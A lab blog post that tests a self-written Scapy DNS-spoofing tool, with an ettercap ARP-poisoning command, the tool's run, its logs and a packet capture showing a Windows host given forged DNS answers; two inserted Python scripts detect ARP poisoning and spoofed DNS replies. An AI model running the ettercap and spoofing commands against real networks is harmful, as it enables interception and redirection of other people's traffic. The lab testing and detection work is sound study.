Sunday, May 25, 2014

Building your own tools - dnsSpoof - Testing

The testing phase
In the previous post we built a DNS spoofing tool using Scapy and Python.
In this post, we validate that the script works as expected.

In this lab we have the following systems:
Kali: 192.168.0.15
Windows Hosts: 192.168.0.16
Gateway: 192.168.0.1

Kali
On this system, we add entries to the hosts file for some common domains.
Let's see what this looks like:
root@securitynik:~# cat /etc/hosts
127.0.0.1    yahoo.com
127.0.0.1   microsoft.com


Let's look at the ARP cache of the Windows system:
C:\>arp -a
Interface: 192.168.0.16 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           00-04-5a-6c-db-79     dynamic

Let's look at a snapshot of the ipconfig output and DNS settings of the Windows system:
Ethernet adapter Local Area Connection:
        IP Address. . . . . . . . . . . . : 192.168.0.16
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.1
        DNS Servers . . . . . . . . . . . : 8.8.8.8
                                            4.2.2.1


Let's look at the Windows system's hosts file to ensure these names are not resolved locally:
C:\>type "c:\WINDOWS\system32\drivers\etc\hosts"
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost

Now let's go ahead and load dnsSpoof.py on Kali:
root@securitynik:~/security-nik# ./dnsSpoof.py eth0 192.168.0.15
Current system is Linux ... Good to go!!
 Sniffing for DNS Packet


Let's load up ettercap to perform the ARP spoofing between the gateway and the Windows host:
root@securitynik:~# ettercap --mitm arp:remote --text --iface eth0 /192.168.0.1/ /192.168.0.16/

Now that ettercap is running, let's check the Windows system's ARP cache again:
C:\>arp -a
Interface: 192.168.0.16 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           08-00-27-41-9b-6c     dynamic
  192.168.0.15          08-00-27-41-9b-6c     dynamic

Awesome!! It looks like the Kali system is claiming to be 192.168.0.1: the gateway entry now carries Kali's MAC address (08-00-27-41-9b-6c) instead of 00-04-5a-6c-db-79.
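The ARP cache above is the symptom a defender on the Windows side could check for: two IP addresses sharing one MAC, and the gateway's MAC differing from what it was before. The following is an added example (not code from the original post or from dnsSpoof/ettercap) that parses `arp -a` output and raises both checks. The sample text is the cache shown above, embedded as constructed input, and the baseline gateway MAC is the one from the first `arp -a` listing.

```python
import re
from collections import defaultdict

# Constructed sample: the Windows ARP cache as shown after ettercap started.
ARP_OUTPUT = """\
Interface: 192.168.0.16 --- 0x2
  Internet Address      Physical Address      Type
  192.168.0.1           08-00-27-41-9b-6c     dynamic
  192.168.0.15          08-00-27-41-9b-6c     dynamic
"""

# One `arp -a` entry: IPv4 address, Windows-style dashed MAC, entry type.
ARP_LINE = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9a-fA-F]{2}(?:-[0-9a-fA-F]{2}){5})\s+(\w+)"
)


def parse_arp_table(text):
    """Return (ip, mac, type) tuples for every entry line in `arp -a` output.

    Header and 'Interface:' lines do not match the pattern and are skipped.
    """
    entries = []
    for line in text.splitlines():
        m = ARP_LINE.match(line)
        if m:
            entries.append((m.group(1), m.group(2).lower(), m.group(3).lower()))
    return entries


def find_shared_macs(entries):
    """Map each MAC that is claimed by more than one IP to the sorted list of IPs."""
    by_mac = defaultdict(set)
    for ip, mac, _ in entries:
        by_mac[mac].add(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def gateway_mac_changed(entries, gateway_ip, baseline_mac):
    """True when the gateway's cached MAC differs from a previously recorded baseline."""
    current = {ip: mac for ip, mac, _ in entries}.get(gateway_ip)
    return current is not None and current != baseline_mac.lower()


def arp_alerts(text, gateway_ip, baseline_mac):
    """Run both checks and return a list of human-readable alert strings."""
    entries = parse_arp_table(text)
    alerts = []
    for mac, ips in find_shared_macs(entries).items():
        alerts.append(f"MAC {mac} is claimed by several IPs: {', '.join(ips)}")
    if gateway_mac_changed(entries, gateway_ip, baseline_mac):
        alerts.append(f"gateway {gateway_ip} no longer has baseline MAC {baseline_mac}")
    return alerts


if __name__ == "__main__":
    # Baseline MAC taken from the first `arp -a` listing on this page.
    for alert in arp_alerts(ARP_OUTPUT, "192.168.0.1", "00-04-5a-6c-db-79"):
        print("ALERT:", alert)
```

The shared-MAC check alone is only a lead, since a router that owns several addresses on one interface legitimately shows one MAC for several IPs; comparing the gateway entry against a recorded baseline is the stronger signal, which is why the example reports both separately.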

Let's go ahead and ping some hosts from our Windows system.
Remember that when we ran ./dnsSpoof.py above we used 192.168.0.15 as the spoofed DNS server (./dnsSpoof.py eth0 192.168.0.15).

C:\>ping yaooo.com -n 1 && ping microsoft.com -n 1

Pinging yaooo.com [192.168.0.15] with 32 bytes of data:
Reply from 192.168.0.15: bytes=32 time<1ms TTL=64

Pinging microsoft.com [192.168.0.15] with 32 bytes of data:
Reply from 192.168.0.15: bytes=32 time<1ms TTL=64

As can be seen above, the Windows system now resolves both yahoo.com (typed as yaooo.com) and microsoft.com to 192.168.0.15.

What did dnsSpoof see?
Got Query on Sun May 25 12:51:23 2014
 Received Src IP:192.168.0.16,
 Received Src Port: 53049
 Received Query ID:33693
 Query Data Count:1
 Current DNS Server:8.8.8.8
 DNS Query:yaooo.com.

 Sending spoofed response packet
Sent 1 packets.
 Spoofed DNS Server: 192.168.0.15
 src port:53 dest port:53049
 Sniffing for DNS Packet
 Sniffing for DNS Packet
 Sniffing for DNS Packet

 Got Query on Sun May 25 12:51:23 2014
 Received Src IP:192.168.0.16,
 Received Src Port: 64982
 Received Query ID:36189
 Query Data Count:1
 Current DNS Server:8.8.8.8
 DNS Query:microsoft.com.

 Sending spoofed response packet
Spoofed DNS Server: 192.168.0.15
 src port:53 dest port:64982

dnsSpoof saw the requests for yahoo.com and microsoft.com and sent a spoofed response to each.

But how can we further confirm this, you ask? Let's look at the packet capture from the Windows system's perspective.
Packets don't lie ... or at least shouldn't :-)

C:\tools>WinDump.exe -nn -r dnsspoof.pcap port 53
reading from file dnsspoof.pcap, link-type EN10MB (Ethernet)
12:51:23.466964 IP 192.168.0.16.53049 > 8.8.8.8.53:  33693+ A? yaooo.com. (27)
12:51:23.480022 IP 192.168.0.15.53 > 192.168.0.16.53049:  33693*- 1/1/1 A 192.168.0.15 (112)

12:51:23.497526 IP 192.168.0.16.64982 > 8.8.8.8.53:  36189+ A? microsoft.com. (31)
12:51:23.503152 IP 192.168.0.15.53 > 192.168.0.16.64982:  36189*- 1/1/1 (128)


If we compare the capture with the messages from dnsSpoof, we can see the following for the first query:
Both dnsSpoof and WinDump report the time as 12:51:23
Looking at the source port, we see the same value: 53049
Looking at the query ID, we see 33693
... and the query name? We see yaooo.com, exactly as it was typed in the ping command

More importantly, we see that while the client at 192.168.0.16 sent its request to 8.8.8.8, the response it accepted came from 192.168.0.15.
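The correlation just done by hand (match query and answer on client port and query ID, then compare who was asked with who answered) is exactly what a defender can automate over a capture. The following is an added example, not code from the original post or from the dnsSpoof tool, that parses the tcpdump/WinDump `-nn` line format shown above, pairs each answer with its query, and flags any answer whose source address is not the server the query was sent to. The four capture lines from this page are embedded as constructed input (with the wrapped "(112)" line rejoined).

```python
import re

# Constructed sample: the WinDump lines shown on this page, not a live capture.
WINDUMP_OUTPUT = """\
12:51:23.466964 IP 192.168.0.16.53049 > 8.8.8.8.53:  33693+ A? yaooo.com. (27)
12:51:23.480022 IP 192.168.0.15.53 > 192.168.0.16.53049:  33693*- 1/1/1 A 192.168.0.15 (112)

12:51:23.497526 IP 192.168.0.16.64982 > 8.8.8.8.53:  36189+ A? microsoft.com. (31)
12:51:23.503152 IP 192.168.0.15.53 > 192.168.0.16.64982:  36189*- 1/1/1 (128)
"""

# "HH:MM:SS.usec IP src.sport > dst.dport:  txid<flags> <rest>"
DNS_LINE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP "
    r"(?P<sip>\d+(?:\.\d+){3})\.(?P<sport>\d+) > "
    r"(?P<dip>\d+(?:\.\d+){3})\.(?P<dport>\d+):\s+"
    r"(?P<txid>\d+)(?P<flags>[-+*$|]*)\s*(?P<rest>.*)$"
)
QNAME = re.compile(r"A\? (\S+)")  # query name as printed for an A? query


def parse_dns_lines(text):
    """Parse each matching line into a dict; non-DNS lines (headers, blanks) are skipped."""
    records = []
    for line in text.splitlines():
        m = DNS_LINE.match(line)
        if not m:
            continue
        r = m.groupdict()
        for key in ("sport", "dport", "txid"):
            r[key] = int(r[key])
        # Traffic from port 53 is an answer; traffic to port 53 is a query.
        r["is_response"] = r["sport"] == 53
        records.append(r)
    return records


def correlate(records):
    """Pair answers with queries on (client IP, client port, txid) and judge each answer."""
    pending = {}   # (client_ip, client_port, txid) -> query record
    findings = []
    for r in records:
        if not r["is_response"]:
            pending[(r["sip"], r["sport"], r["txid"])] = r
            continue
        query = pending.pop((r["dip"], r["dport"], r["txid"]), None)
        if query is None:
            # No outstanding query: either unsolicited, or a second answer to a
            # query already answered (the race signature of a spoofed reply).
            findings.append({"name": None, "txid": r["txid"], "client_port": r["dport"],
                             "asked": None, "answered_by": r["sip"],
                             "verdict": "unsolicited_or_duplicate"})
            continue
        name = QNAME.search(query["rest"])
        findings.append({
            "name": name.group(1) if name else None,
            "txid": r["txid"],
            "client_port": query["sport"],
            "asked": query["dip"],
            "answered_by": r["sip"],
            "verdict": "spoofed" if r["sip"] != query["dip"] else "ok",
        })
    return findings


if __name__ == "__main__":
    for f in correlate(parse_dns_lines(WINDUMP_OUTPUT)):
        print(f"{f['verdict']:>24}  id={f['txid']} port={f['client_port']} "
              f"{f['name']} asked={f['asked']} answered_by={f['answered_by']}")
```

On the page's capture both answers are judged spoofed because 8.8.8.8 was asked and 192.168.0.15 answered. If the genuine reply from 8.8.8.8 had also arrived, it would show up as a second answer to an already-matched (port, ID) pair, which the example reports rather than silently discards, since two answers to one query is itself worth alerting on.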

Based on the above, I would conclude the tool works as expected.

Go ahead and analyse the microsoft.com request by yourself ;-)

As seen across these two posts on building and testing your own tools (dnsSpoof.py), it really does not take much effort if you are willing to put in the time.
